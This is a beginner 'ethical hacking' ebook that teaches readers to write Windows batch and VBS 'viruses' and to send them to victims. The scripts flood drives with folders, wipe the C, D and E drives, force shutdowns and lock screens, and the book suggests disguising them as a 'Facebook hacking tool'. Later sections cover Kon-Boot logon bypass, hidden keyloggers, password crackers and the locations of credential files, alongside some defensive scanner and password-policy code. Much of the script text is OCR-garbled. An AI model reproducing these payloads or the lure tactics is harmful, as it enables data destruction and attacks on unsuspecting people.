TheBigComputing.com


We cover unique Ethical Hacking and Performance improvement guides, News and Tutorials. Our aim is to make your digital life easy, pleasant and secure. Ujjwal is a regular author and also chief security administrator at the place, where you can get solutions to your queries.


LEGAL DISCLAIMER


Any proceedings or activities regarding the material contained within this volume are exclusively your liability. The misuse and mistreatment of the information/tutorials in this book can result in unlawful charges being brought against the persons in question. The authors and review analyzers will not be held responsible in the event any unlawful charges are brought against any individuals for misusing the information in this book to break the law. This book contains material and resources that can be potentially destructive or dangerous. If you do not fully comprehend something in this book, don't study this book. Please refer to the laws and acts of your state/region/province/zone/territory or country before accessing, using, or in any other way utilizing these resources.


These materials and resources are for educational and research purposes only. Do … with anything enclosed here within. If this is your intention, then leave now. Neither the writer of this book, the review analyzers, the publisher, nor anyone else affiliated in any way is going to admit any responsibility for your proceedings, actions or trials.
PREFACE


Computer hacking is the practice of altering computer hardware and software to carry out a goal outside of the creator's original intention. People who engage in computer hacking activities are often called hackers. The majority of people assume that hackers are computer criminals. They fail to recognize that criminals and hackers are two entirely unrelated things. Hackers in reality are good and extremely intelligent people who, by using their knowledge in a constructive way, help organizations, companies, governments, etc. to secure credentials and secret information on the Internet. Years ago, no one had to worry about crackers breaking into their computer and installing Trojan viruses, or using their computer to send attacks against others. Now that things have changed, it's best to be aware of how to defend your computer from damaging intrusions and keep black hat hackers out. So, in this book you will uncover the finest ways to defend your computer systems from hackers. This book is written with one object in mind: that a beginner who is not very familiar with computer hacking can easily attempt these hacks and recognize what we are trying to demonstrate. After reading this book you will come to recognize how hacking affects our everyday routine work and how hazardous it can be in many fields, such as bank account hacking. Moreover, after working through this volume in detail you will be capable of understanding how a hacker hacks and how you can defend yourself from these threats.


FOR ANY QUERIES AND 
SUGGESTIONS FEEL 
FREE TO CONTACT ME: 
ujjwal@thebigcomputing.com 


In The Loving 
Memory of my DAD 


Your hands so warm
Your voice so clear
I still remember your laughter
Like yesterday had never gone
I miss your words of encouragement
Words that kept me hanging on
Now you are gone
The tears keep flowing
Only hoping
That one day the pain will fade
Dad why did you have to go away
We love you and miss you
I know I will again see you someday
FOOLISH ASSUMPTIONS...


I make a few assumptions about you:

* You're familiar with basic computer- and networking-related concepts and terms.
* You have a basic understanding of what hackers and malicious users do.
* You have access to a computer and a network on which to use these techniques.
* You have access to the Internet to obtain the various tools used in the ethical hacking process.
* You have permission to perform the hacking techniques described in this book.
INTRODUCTION TO HACKERS


First of all, before digging into intense hacking processes, let's take a look at what hacking is, who the hackers are, what their intentions are, the types of hackers, their communities, etc.


Communities of Hackers: 


HACKERS 
CRACKERS 
PHREAKS 
SCRIPT KIDDIES 


HACKERS are the intelligent computer experts.

Intention of hackers:

* To gain in-depth knowledge of any computer system: what is happening at the backend of any specific program, behind the screen of the computer system.
* Their motive is to find possible security risks and vulnerabilities in a computer system or network.
* They create security awareness among people by sharing knowledge and the proper security precautions that users should take.


Types of Hackers:


* White Hat Hackers: “White hats” is the name used for security experts. While they often use the same tools and techniques as the black hats, they do so in order to foil the bad guys. That is, they use those tools for ethical hacking and computer forensics. Ethical hacking is the process of using security tools to test and improve security (rather than to break it!). Computer forensics is the process of collecting evidence needed to identify and convict computer criminals.

* Black Hat Hackers: They use their knowledge and skill set for illegal activities and destructive intents. Obviously, the “black hats” are the bad guys. These are the people who create and send viruses and worms, break into computer systems, steal data, shut down networks, and basically commit electronic crimes. We talk about black hats at several points in this book. Black hat hackers and malware writers are not considered the same thing in the security community, even though they are both breaking the law.

* Gray Hat Hackers: They use their knowledge and skill set for both legal and illegal purposes. They are white hats in public but internally they do some black hat work. Gray hats sit in the middle of the fence because sometimes they cross that ethical line (or more often, define it differently). For example, gray hats will break into a company's computer system just to wander around and see what's there. They think that simply because they don't damage any data, they're not committing a crime. Then they go and apply for jobs as security consultants for large corporations. They justify their earlier break-in as some sort of computer security training. Many really believe that they're providing a public service by letting companies know that their computers are at risk.


CRACKERS are those who break into applications with malicious intentions, either for their personal gain or their greedy achievements.


Intention of crackers:

* Their motive is to get unauthorized access into a system and cause damage, or destroy or reveal confidential information.
* To compromise the system to deny services to legitimate users, in order to trouble or harass them or to take revenge.
* It can cause financial losses and image/reputation damage, and defamation in society for individuals or organizations.


PHREAKS are those people who use computer devices and software programs, and their tricky and sharp minds, to break into phone networks.


Intention of phreaks:

* To find loopholes in the security of phone networks and to make phone calls and access the internet free of cost!
* You may get a spoofed call or a large bill.
* You can also get a call from your own number.


SCRIPT KIDDIES: These are computer novices who take advantage of the hacker tools, vulnerability scanners, and documentation available free on the Internet but who don't have any real knowledge of what's really going on behind the scenes. They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind. Even though these guys are the stereotypical hackers that you hear about in the news media, they often need only minimal skills to carry out their attacks.


Intention of script kiddies:

* They use the available information about known vulnerabilities to break into network systems.
* It's an act performed for fun or out of curiosity.

Black Hat Hackers Strategy:

* Information gathering & scanning
* Getting access to the website
* Maintaining the access
* Clearing the tracks

Conclusion: Security is important because prevention is better than cure.


HACKERS WANT YOUR PC...


You might be thinking that hackers don't care about your computer, but they do. Hackers want access to your system for many different reasons. Remember, once a hacker breaks in and plants a Trojan, the door is open for anyone to return. The hackers know this and are making money from it. They know it's easy to hide and very difficult to track them back once they own your PC.


Overall, the Internet is an easy place to hide. Compromised computers around the world have helped to make hiding simple. It is easy to find the last IP address from which an attack was launched, but hackers hop through many unsecured systems to hide their location before they launch attacks.


An IP address is a unique address that identifies where a computer is connected to the Internet. Every computer, even yours if you're using broadband access, has an Internet Protocol (IP) address.


Over the past four years, most cyber-attacks have been launched from computers within India. However, this doesn't mean that systems in India are the original source of the attack. A hacker in Pakistan could actually use your computer to launch a denial of service (DoS) attack. To the entire world, it might even look as if you started the attack because the hacker has hidden his tracks so that only the last “hop” can be traced.


VIRUS CREATIONS 


CREATION OF VIRUS IN NOTEPAD


Now, it's time to administrate your computer by creating some viruses in the form of batch files. You can create various types of viruses with distinct functionality. Each and every virus will affect the victim's computer system in the way you have coded it in the batch file. You can create viruses which can freeze the victim's computer or crash it.


Virus creation codes of the batch file:

-- Codes to be written in the notepad --

-- Extension of the files should be ".bat" --


1.) To create a huge amount of folders on victim's desktop screen:

First of all, your task is to copy the following codes into the notepad of your computer. To open the notepad:


Go to the Run option of your computer by pressing “Windows+R”. Simply type “notepad” and click on the OK option.




CODES:

@echo off
:top
md %random%
goto top


Now that you have copied the code into the notepad, your next task is to save the text document you have created. Go to the File option and save your document under any name, but don't forget to keep the extension as ‘.bat’.


For example, you can save your text document under the name “ujjwal.bat”.


Or you can also name your document “Facebook hacking tool.bat” to confuse the victim and get him to open the virus you have created to destroy the desktop of the victim.




When you have finished saving the document, just double click on the batch file to open it.


Suddenly you will see that the command prompt of the victim's computer opens automatically and displays a large amount of code running in the command prompt.

After 5-10 seconds you will see that a huge number of folders have been created automatically on the desktop of the victim, which will also lead the desktop to freeze or crash.


2.) To create more folders in C, D, and E drive of victim's computer:


As we have learned above how to create many folders on the desktop of the victim, in the same way we can create a lot of folders in the C:, D:, and E: drives of the victim's computer by applying the same method as above, with a little amendment in the code of the batch file of this virus.


CODES:

@echo off
:VIRUS
cd /d C:
md %random%
cd /d D:
md %random%
cd /d E:
md %random%
goto VIRUS


Copy and paste the above code into the notepad and follow the same steps as before to create more folders in the local drives of the victim's computer.


3.) To format C, D: and E: 
drive of your computer: 


Open Notepad 
Copy the below command 
there 


"rd/s/q D^ 

rd/s/q C^ 

rd/s/q E:\" (Without quotes) 
Save as "anything.bat 


Double click on the virus 
icon. 

This virus formats the C, D 
and E Drive in 5 Seconds. 

4.) Convey your friend a little 
message and shut down his / 
her computer: 


@echo off 


msg * I don't like you 
shutdown -c "Error! You are 
too stupid!" -s 


Save it as "Anything.BAT" in 
All Files and send it. 


5.) Open Notepad, slowly type 
"Hello, how are you? I am 
good thanks" and freak your 
friend out: 


Open the notepad and type 
the following code : 


WScript.Sleep 180000 
WScript.Sleep 10000 

Set WshShell — 
WScript.CreateObject(" WSeri 
WshShell.Run "notepad" 
WScript.Sleep 100 
WshShell.AppActivate 
"Notepad" 

WScript.Sleep 500 
WshShell.SendKeys "Hel" 
WScript.Sleep 500 
WshShell.SendKeys "lo " 
WScript.Sleep 500 
WshShell.SendKeys ", ho" 


WScript.Sleep 500 
WshShell.SendKeys "w a" 
WScript.Sleep 500 
WshShell.SendKeys "re " 
WScript.Sleep 500 
WshShell.SendKeys "you" 
WScript.Sleep 500 
WshShell.SendKeys "? " 
WScript.Sleep 500 
WshShell.SendKeys "I a" 
WScript.Sleep 500 
WshShell.SendKeys "m g" 
WScript.Sleep 500 
WshShell.SendKeys "ood" 


WScript.Sleep 500 
WshShell.SendKeys " th" 
WScript.Sleep 500 
WshShell.SendKeys "ank" 
WScript.Sleep 500 
WshShell.SendKeys "s! " 


Save it as "Anything. VBS" 
and send it. 

6.) Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Open the notepad and type the following codes:


Set wshShell = 
wscript.CreateObject("WScrit 
do 

wscript.sleep 100 
wshshell.sendkeys "You are a 
fool." 

loop 


Save it as "Anything. VBS" 
and send it. 

7.) Open Notepad continually 
in your friend's computer: 


Open the notepad and type 
the following codes: 

@ECHO off 

Дор 

START 
%SystemRoot%\system32\not 
GOTO top 


Save it as "Anything. BAT" 
and send it. 

8.) THREATEN YOUR FRIEND BY MAKING THE SCREEN FLASH


To make a really cool batch 
file that can make your entire 
screen flash random colors 
until you hit a key to stop it, 
simply copy and paste the 
following code into notepad 
and then save it as a .bat file. 


@echo off 

echo e100 B8 13 00 CD 10 
E4 40 88 C3 E4 40 88 C7 F6 
E3 30>\z.dbg echo e110 DF 
88 C1 BA C8 03 30 СО EE 
BA DA 03 EC A8 08 


75>>\z.dbg echo e120 FB EC 
A8 08 74 FB BA C9 03 88 
D8 EE 88 F8 EE 88>>\z.dbg 
echo e130 C8 EE B4 01 CD 
16 74 CD B8 03 00 CD 10 
C3>>\z.dbg echo 
e=100>>\z.dbg 

echo q>>\z.dbg 

debug <\z.dbg>nul 

del \z.dbg 


But if you really want to mess 
with a friend then copy and 
paste the following code 


which will do the same thing 
except when they press a key 
the screen will go black and 
the only way to stop the batch 
file is by pressing CTRL- 
ALT-DELETE. 

Codes: 


@echo off :a echo e100 B8 
13 00 CD 10 E4 40 88 C3 E4 
40 88 C7 F6 ЕЗ 30>\z.dbg 
echo e110 DF 88 Cl BA C8 
03 30 CO EE BA DA 03 EC 
А8 08 75>>\z.dbg echo e120 


FB EC A8 08 74 FB BA C9 
03 88 D8 EE 88 F8 EE 
88>>\z.dbg echo e130 C8 EE 
B4 01 CD 16 74 CD B8 03 
00 CD 10 C3>>\z.dbg echo 
e=100>>\z.dbg 

echo q>>\z.dbg 

debug <\z.dbg>nul 

del \z.dbg 

goto a 


To disable it, press Ctrl+Shift+Esc and then end the process wscript.exe. Enjoy!!!


Note: some of the above codes can harm your computer after execution, so don't try them on your PC. You can use a test computer for it.
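From the defender's side, the batch files above share a few static traits that can be checked before an unknown .bat attachment is ever run. The following triage scanner is an added example, not code from the book; the rule set, the finding names and the sample scripts are assumptions constructed for illustration.

```python
import re

# Heuristic rules (assumptions of this example) modelled on the batch files
# shown in this chapter. Each rule is matched against one line at a time.
LINE_RULES = [
    ("recursive delete of a drive root",
     re.compile(r'^\s*@?(?:rd|rmdir)(?:\s*/[sq]){2}\s*"?[a-z]:\\?"?\s*$', re.I)),
    ("forced shutdown",
     re.compile(r"^\s*@?shutdown\b.*\s[-/]s\b", re.I)),
    ("script piped into debug.exe",
     re.compile(r"^\s*@?debug(?:\.exe)?\s*<", re.I)),
]
LABEL = re.compile(r"^\s*:([\w.-]+)")
GOTO = re.compile(r"^\s*@?goto\s+:?([\w.-]+)", re.I)
SPAWN = re.compile(r"^\s*@?(?:md|mkdir|start)\b", re.I)
GUARD = re.compile(r"^\s*@?(?:if|exit|pause|timeout|choice)\b", re.I)
LOOP_FINDING = "unbounded loop that creates folders or starts programs"


def scan_batch(text):
    """Return (line_number, finding) pairs for one batch script."""
    lines = text.splitlines()
    findings = []
    labels = {}  # label name -> line number where it was defined
    for no, line in enumerate(lines, 1):
        for name, rule in LINE_RULES:
            if rule.search(line):
                findings.append((no, name))
        label = LABEL.match(line)
        if label:
            labels[label.group(1).lower()] = no
        jump = GOTO.match(line)
        if jump and jump.group(1).lower() in labels:
            # Unconditional backward jump: inspect the loop body between
            # the label and this goto.
            body = lines[labels[jump.group(1).lower()]:no - 1]
            spawns = any(SPAWN.match(l) for l in body)
            guarded = any(GUARD.match(l) for l in body)
            if spawns and not guarded:
                findings.append((no, LOOP_FINDING))
    return findings


# Constructed sample scripts: three with the traits above, one benign.
SAMPLES = {
    "folder_loop.bat": "@echo off\n:top\nmd %random%\ngoto top\n",
    "wipe.bat": "@echo off\nrd/s/q D:\\\nrd /s /q C:\\\n",
    "prank.bat": '@echo off\nmsg * hello\nshutdown -c "bye" -s\n',
    "build.bat": "@echo off\nrd /s /q C:\\temp\\build\nmd C:\\temp\\build\n"
                 ":retry\nping -n 1 example.invalid\nif errorlevel 1 goto retry\n",
}

if __name__ == "__main__":
    for name, script in SAMPLES.items():
        hits = scan_batch(script)
        print(name, "->", hits if hits else "no findings")
```

These are string heuristics only: a converted EXE or an obfuscated script will not match, so a clean result is not proof that a file is safe.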


BATCH TO EXE CONVERSION


Convert Batch files into Executable Programs

The batch files and the executable files work in an almost similar way. Basically, both are a set of instructions and logic for command execution. But we usually prefer executable files, as they are more convenient than batch files.


But why would we want that?

Some of the reasons are listed below:

1. We can include extra tools in our EXE-dependent batch file.

2. Moreover, an EXE provides protection to the source script to restrict modification.

3. EXE files can be pinned to the Windows Start menu as well as to the taskbar.

Here we are using a tool called “Batch to exe converter”, which provides you a platform to run the batch files as executable files.

You can download it from here

“Bat to Exe Converter” is a flow conversion program whose purpose is to help you easily obtain executable files out of batch items.

If you prefer to convert a BATCH file into an executable one easily, “Bat to Exe Converter” is a simple and yet effective solution.


The application provides you with a simplified interface, which makes it comfortable for both beginner and advanced users. From its primary window, you have the ability to select the desired batch file and output file. Then, you will be able to customize your settings according to your choice and preferences.


Another interesting and compatible feature is that you can choose the language for your EXE file, the choices being English or German. From the Options tab, users can opt to create a visible or invisible application, which means displaying a console window or not. However, if you want to encrypt the resulting EXE file, you can protect it with a security password.


MESSING UP WITH REGISTRY


HACKING “OPEN” OPTION

If we want to open any folder, either we double click on the folder or we right click on the folder, and it will show us a dialogue box with the OPEN option at the top of the dialogue box.


And today we are going to learn how to hack the “OPEN” option, replacing it with any text you want.

STEPS:

Go to the “Run” option, type "regedit" and click on OK.

Note: “regedit” stands for registry editing.


Registry: it is responsible for saving the binary equivalent working of every application in the operating system.


Then the registry editing window will open in front of you. It has five options:

1. HKEY_CLASSES_ROOT
2. HKEY_CURRENT_USER
3. HKEY_LOCAL_MACHINE
4. HKEY_USERS
5. HKEY_CURRENT_CONFIG


Then you have to click on "HKEY_CLASSES_ROOT". It will open and you will see a lot of items under it.

Search for the “FOLDER” option under it.


Click on the Folder option to open it.

When you open the Folder option you will see the "SHELL" option. By opening the "SHELL" option you will see the “OPEN” option under it. Just give a single click on the Open option instead of opening it. You will see two items defined in the left white workspace.


Just open the “Default” string (1st option).

Do not touch the value name. Type anything with which you want to replace your "open" option.


For example, I am typing here “your computer is hacked by Ujjwal Sahay”.


Then click on the OK option. Now go to any folder and just give a right click to it.


Woooooo! Now the Open option is replaced by the text “your computer is hacked by Ujjwal Sahay”.


PASSWORD CRACKING EXPLAINED


PASSWORD CRACKING

Password crackers are the most famous and elementary tools in the hacker's toolbox. These have been around for some time and are fairly effective at “guessing” most users' passwords, at least in part because most users do a very poor job of selecting secure passwords.


First of all, if a hacker is going to crack your password, then as the very first step they usually try some guesses. They generally make this easier through social engineering. Hackers know that most users select simple passwords that are easy to remember. The top choices of the users are nearly always names that are personally meaningful to the user: first names of immediate family members lead the list, followed by pets' names and favorite sporting teams. Password crackers may end up loading full English dictionaries, but they can hit a fair number of passwords with the contents of any popular baby name book. Other poor password selections include common numbers and numbers that follow a common format such as phone numbers and social security numbers.


Compounding the problem, many users set the same user name and password for all accounts, allowing hackers to have a field day with a single harvested password. That's something to consider before you use the same password for Facebook as you use at school or at work.

The key to creating a good password is to create something that someone cannot guess or easily crack. Using your pet's name therefore is not a good technique. Using your login name is also a bad technique because someone who knows your login (or your name, since many login names are simply variations on your surname) could easily break into your system.


Cracking passwords with hardcore tools


High-tech password cracking involves using a program that tries to guess a password by determining all possible password combinations. These high-tech methods are mostly automated after you access the computer and password database files.

The main password-cracking methods are dictionary attacks, brute-force attacks, and rainbow attacks. You find out how each of these works in the following sections.


Password-cracking software: You can try to crack your organization's operating system and application passwords with various password-cracking tools:

Cain & Abel: Cain and Abel is a well-known password cracking tool that is capable of handling a variety of tasks. The most notable thing is that the tool is only available for Windows platforms. It can work as a sniffer in the network, cracking encrypted passwords using the dictionary attack, brute force attacks, cryptanalysis attacks, revealing password boxes, uncovering cached passwords, decoding scrambled passwords, and analyzing routing protocols. It cracks LM and NT LanManager (NTLM) hashes, Windows RDP passwords, Cisco IOS and PIX hashes, VNC passwords, RADIUS hashes, and lots more. (Hashes are cryptographic representations of passwords.)


Brutus: Brutus is one of the most popular remote online password cracking tools. It claims to be the fastest and most flexible password cracking tool. This tool is free and is only available for Windows systems. It was released back in October 2000.


It supports HTTP (Basic Authentication), HTTP (HTML Form/CGI), POP3, FTP, SMB, Telnet and other types such as IMAP, NNTP, NetBus, etc. You can also create your own authentication types. This tool also supports multi-stage authentication engines and is able to connect to 60 simultaneous targets. It also has resume and load options, so you can pause the attack process at any time and then resume whenever you want.


Elcomsoft Distributed Password Recovery: (www.elcomsoft.com/edpr.htr) cracks Windows, Microsoft Office, PGP, Adobe, iTunes, and numerous other passwords in a distributed fashion using up to 10,000 networked computers at one time. Plus, this tool uses the same graphics processing unit (GPU) video acceleration as the Elcomsoft Wireless Auditor tool, which allows for cracking speeds up to 50 times faster.


Elcomsoft System Recovery: (www.elcomsoft.com/esr.html) cracks or resets Windows user passwords, sets administrative rights, and resets password expirations, all from a bootable CD.


John the Ripper: (www.openwall.com/john) John the Ripper is another well-known free open source password cracking tool for Linux, UNIX and Mac OS X. A Windows version is also available. This tool can detect weak passwords. A pro version of the tool is also available, which offers better features and native packages for target operating systems.


ophcrack: (http://ophcrack.sourceforge.n) cracks Windows user passwords using rainbow tables from a bootable CD. Rainbow tables are pre-calculated password hashes that can help speed up the cracking process.


Aircrack-NG: (http://www.aircrack-ng.org/) Aircrack-NG is a WiFi password cracking tool that can crack WEP or WPA passwords. It analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm. It is available for Linux and Windows systems. A live CD of Aircrack is also available.


Proactive System Password Recovery: (www.elcomsoft.com/pspr.html) recovers practically any locally stored Windows password, such as logon passwords, WEP/WPA passphrases, SYSKEY passwords, and RAS/dialup/VPN passwords.


Rainbow Crack: (http://project-rainbowcrack.com) Rainbow Crack is a hash cracker tool that uses a large-scale time-memory tradeoff process for faster password cracking than traditional brute force tools. Time-memory tradeoff is a computational process in which all plain text and hash pairs are calculated by using a selected hash algorithm. After computation, results are stored in the rainbow table. This process is very time consuming. But once the table is ready, it can crack a password much faster than brute force tools.

You also do not need to generate rainbow tables by yourself. The developers of Rainbow Crack have also generated LM rainbow tables, NTLM rainbow tables, MD5 rainbow tables and SHA1 rainbow tables. Like Rainbow Crack, these tables are also available for free. You can download these tables and use them for your password cracking processes.


pwdump3: (www.openwall.com/passwort 2000-xp-2003-vista-7#pwdump) extracts Windows password hashes from the SAM (Security Accounts Manager) database.


Password storage locations vary by operating system:


Windows usually stores passwords in these locations:

* Security Accounts Manager (SAM) database (c:\winnt\system32\config) or (c:\windows\system32\config)
* Active Directory database file that's stored locally or spread across domain controllers (ntds.dit)

Windows may also store passwords in a backup of the SAM file in the c:\winnt\repair or c:\windows\repair directory.


Some Windows applications store passwords in the Registry or as plaintext files on the hard drive! A simple registry or file-system search for “password” may uncover just what you're looking for.


Linux and other UNIX variants typically store passwords in these files:

* /etc/passwd (readable by everyone)
* /etc/shadow (accessible by the system and the root account only)
* /.secure/etc/passwd (accessible by the system and the root account only)
* /etc/security/passwd (accessible by the system and the root account only)
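Because /etc/passwd is readable by everyone, an administrator can audit it for entries that still carry a hash or an empty password field, and confirm that the shadow file is closed to ordinary users. The script below is an added example, not code from the book; the sample passwd lines and the helper names are constructed for illustration.

```python
import os
import stat
import tempfile

# Constructed sample in /etc/passwd format (7 colon-separated fields).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$6$constructedsalt$constructedhash:1001:1001::/home/legacy:/bin/sh
guest::1002:1002::/home/guest:/bin/sh
"""


def audit_passwd(text):
    """Return (account, finding) pairs for risky password fields."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {no}", "malformed entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            # No password at all: anyone can log in as this account.
            findings.append((user, "empty password field"))
        elif pw != "x" and not pw.startswith(("*", "!")):
            # "x" means the hash lives in the shadow file; "*" and "!"
            # mark locked accounts. Anything else is a hash that every
            # local user can read and attack offline.
            findings.append((user, "hash stored in world-readable passwd file"))
    return findings


def world_accessible(path):
    """True if users outside the owner and group have any access bit."""
    return bool(stat.S_IMODE(os.stat(path).st_mode) & 0o007)


def mode_check_demo():
    """Run world_accessible() on a scratch file under two modes."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o640)   # owner rw, group r, others nothing
        tight = world_accessible(path)
        os.chmod(path, 0o644)   # others can read
        loose = world_accessible(path)
    finally:
        os.remove(path)
    return tight, loose


if __name__ == "__main__":
    for account, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {finding}")
    print("scratch file 0640/0644 world accessible:", mode_check_demo())
```

On a real host, pass the contents of /etc/passwd to `audit_passwd()` and call `world_accessible("/etc/shadow")`; both should come back clean.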


MUST HAVE PASSWORD POLICIES


PASSWORD CREATING POLICIES


As an ethical hacker, you should show users the importance of securing their passwords. Here are some tips on how to do that:

* Demonstrate how to create secure passwords. Generally people create their passwords using only words, which can be less secure.
* Show what can happen when weak passwords are used or passwords are shared.
* Diligently build user awareness of social engineering attacks.

Encourage the use of a strong password-creation policy that includes the following criteria:

* Use punctuation characters to separate words.
* Use upper- and lowercase letters, special characters, and numbers.
* Never use only numbers. Such passwords can be cracked quickly.
* Change passwords every 15 to 30 days or immediately if they're suspected of being compromised.
* Use different passwords for each system. This is especially important for network infrastructure hosts, such as servers, firewalls, and routers. It's okay to use similar passwords; just make them slightly different for each type of system, such as wweraw/77-Win7 for Windows systems and wweraw453 for Linux systems.
* Use variable-length passwords. This trick can throw off attackers because they won't know the required minimum or maximum length of passwords and must try all password length combinations.
* Don't use common slang words or words that are in a dictionary.
* Don't rely completely on similar-looking characters, such as 3 instead of E, 5 instead of S, or / instead of /. Password-cracking programs can check for this.
* Use password-protected screen savers. Unlocked screens are a great way for systems to be compromised even if their hard drives are encrypted.
* Don't reuse the same password within at least four to five password changes.
* Don't share passwords. To each his or her own!
* Avoid storing user passwords in an unsecured central location, such as an unprotected spreadsheet on a hard drive. This is an invitation for disaster. Use Password Safe or a similar program to store user passwords.
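Several of the criteria above can be enforced automatically when a user picks a new password. The checker below is an added example, not code from the book: it covers the character-class rule, the numbers-only rule, dictionary words hidden behind look-alike characters, and reuse within the last five changes. The word list is a small constructed sample, and the substitutions beyond 3 for E and 5 for S are assumptions.

```python
import hashlib
import hmac
import os
import re
import string

# 3->e and 5->s are the substitutions named in the text; the others are
# further common ones assumed for this example.
LEET = str.maketrans("3501@$47", "esolasat")
# Constructed sample; a real deployment would load a full dictionary.
WORDLIST = frozenset({"password", "welcome", "summer", "dragon", "monkey"})
HISTORY_DEPTH = 5        # "four to five password changes"
ITERATIONS = 100_000     # PBKDF2 work factor chosen for the example


def _digest(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                               salt, ITERATIONS)


def remember(password):
    """Return a (salt, digest) history record; plaintext is never stored."""
    salt = os.urandom(16)
    return salt, _digest(password, salt)


def reused(password, history):
    """True if the password matches one of the most recent records."""
    return any(hmac.compare_digest(_digest(password, salt), digest)
               for salt, digest in history[-HISTORY_DEPTH:])


def dictionary_hits(password):
    """Dictionary words present once look-alike characters are undone."""
    plain = password.lower().translate(LEET)
    return sorted({w for w in re.split(r"[^a-z]+", plain) if w in WORDLIST})


def check_password(password, history=()):
    """Return a list of policy violations; an empty list means accepted."""
    problems = []
    if password.isdigit():
        problems.append("digits only")
    classes = {
        "lowercase letter": string.ascii_lowercase,
        "uppercase letter": string.ascii_uppercase,
        "number": string.digits,
        "special character": string.punctuation,
    }
    for name, chars in classes.items():
        if not any(c in chars for c in password):
            problems.append(f"no {name}")
    for word in dictionary_hits(password):
        problems.append(f"dictionary word after undoing substitutions: {word}")
    if reused(password, list(history)):
        problems.append(f"reused within the last {HISTORY_DEPTH} changes")
    return problems


if __name__ == "__main__":
    for candidate in ("20240131", "P@55w0rd!", "Mauve;Kettle;49;drift"):
        print(candidate, "->", check_password(candidate) or "accepted")
```

The second candidate shows why look-alike characters are not enough: it contains all four character classes and is still rejected as a dictionary word.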


KONBOOT


BYPASS WINDOWS LOGON SCREEN PASSWORD


Sometimes it creates a critical situation if you forget your Windows administrator password and it's quite urgent to recover it without any flaw. This article will make it convenient to recover your admin password.


We are using a tool named KON-BOOT.


Kon-Boot is an application which will bypass the authentication process of Windows-based operating systems. It enables you to log in to any password-protected test machine without any knowledge of the password.


Kon-Boot works with both 64-bit and 32-bit Microsoft Windows operating systems.


Needed things:

* A pen drive or any USB device such as a memory card, or a blank CD.
* Kon-Boot (latest version).
* Your 5 minutes and also a working mind.


Technical instructions:

1. Download KON-BOOT from the internet.

2. Extract the ZIP and run “KonBootInstaller.exe”.

3. Burn the ISO.

4. Boot from the CD/USB device.

5. After Windows is loaded it will show you a Kon-Boot screen.

6. Leave the password box empty and just hit OK; it will take you directly into the Windows account.

Limitations:

IT MAY CAUSE BSOD (NOTEPAD PARTICULAR BUGS).


KEYLOGGERS 


KEYSTROKE 
LOGGING 


One of the best techniques for capturing passwords is remote keystroke logging: the use of software or hardware to record keystrokes as they’re typed into the computer.


You have probably asked friends or relatives to let you log in to your account from their computers.


So be careful about keyloggers installed on their computers. Even with good intentions, monitoring employees raises various legal issues if it’s not done correctly. Discuss with your legal counsel what you’ll be doing, ask for their guidance, and get approval from upper management.


Logging tools: With keystroke-logging tools, you can assess the log files of your application to see what passwords people are using. Keystroke-logging applications can be installed on the monitored computer.


I suggest you check out Family Key Logger (www.spyarsenel.com). Another popular tool is Invisible Key Logger Stealth; dozens of other such tools are available on the Internet.


One more you can check out is KGB Employee Monitor, which is one of my favorites because it is not only invisible but is also not shown by Task Manager, and it uses password protection too.


Hardware-based tools, such 
as Key Ghost 
(www.keyghost.com), fit 
between the keyboard and the 
computer or replace the 
keyboard altogether. 

A keystroke-logging tool 
installed on a shared 
computer can capture the 
passwords of every user who 
logs in. 


PREVENTIONS: 


The best defense against the 
installation of keystroke- 
logging software on your 
systems is to use an anti- 
malware program that 
monitors the local host. It’s 
not foolproof but can help. As 
for physical key loggers, 
you'll need to visually inspect 
each system. 


The potential for hackers to install keystroke-logging software is another reason to ensure that your users aren’t downloading and installing random shareware or opening attachments in unsolicited emails. Consider locking down your desktops by setting the appropriate user rights through local or group security policy in Windows.


DO YOU HAVE 
RATED 7.9 ? 


Learn How to Hack 
Windows Experience 
Index 


Starting with Windows Vista, Microsoft introduced a kind of benchmarking system in its operating system. In Windows Vista and 7, users can rate their PC using the Windows Experience Index. The highest possible score in Windows Vista is 5, while Windows 7 machines can go up to 7.9 in the experience index.


In the Windows Experience Index, the base score is the lowest score of any component. On the test PC, for example, it was 4.4 because of the Graphics subscore.


However it is not so tough to 
manipulate these numbers 
and change these scores 
according to your will. You 
can change these just to fool 
anyone. 


GETTING STARTED 


To keep things simple, we recommend running the Windows Experience Index first if you have not done so. If you have already done that, you can skip this section.


To do that, open Control Panel, go to System and Security, and then click Check the Windows Experience Index.


After that, click Rate this computer.

Note that your computer may take several minutes to rate the system.


You will see a screen similar to this.


[Screenshot: the Windows Experience Index window listing the subscores, with the base score determined by the lowest subscore.]


MESSING UP WITH 
SCORES 

To manipulate these scores, go to the Windows installation drive (C: in our case). Then go to


Windows > Performance > WinSAT > DataStore


You will see several indexing files there.


You will need to open the file ending with “Formal.Assessment (Initial).WinSAT”.


Open the file in Notepad. You will see the following window:


<?xml version="1.0" encoding="UTF-16"?>
<WinSAT><ProgramInfo><Name>WinSAT</Name><Version>V6.1 Build-7600.16385</Version><WinEIVersion>Windows7-RC-0.91</WinEIVersion><Title>Windows System Assessment Tool</Title>
<ModulePath>C:\Windows\system32\winsat.exe</ModulePath>
<CmdLine><![CDATA["C:\Windows\system32\winsat.exe" formal -cancelevent fefd58c2-029b-49ff-94b8-8fafda0147cc]]></CmdLine><Note><![CDATA[]]></Note></ProgramInfo>
<SystemEnvironment><ExecDateTOD Friendly="Saturday October 12, 2013 11:58:50am">735153:43130108</ExecDateTOD><IsOfficial>1</IsOfficial><IsFormal/><RanOverTs>0</RanOverTs><RanOnBatteries>0</RanOnBatteries></SystemEnvironment>
<WinSPR><SystemScore>4.4</SystemScore>
<MemoryScore>5.9</MemoryScore>
<CpuScore>6.7</CpuScore>
<CPUSubAggScore>6.4</CPUSubAggScore>
<VideoEncodeScore>6.9</VideoEncodeScore>
<GraphicsScore>4.4</GraphicsScore>
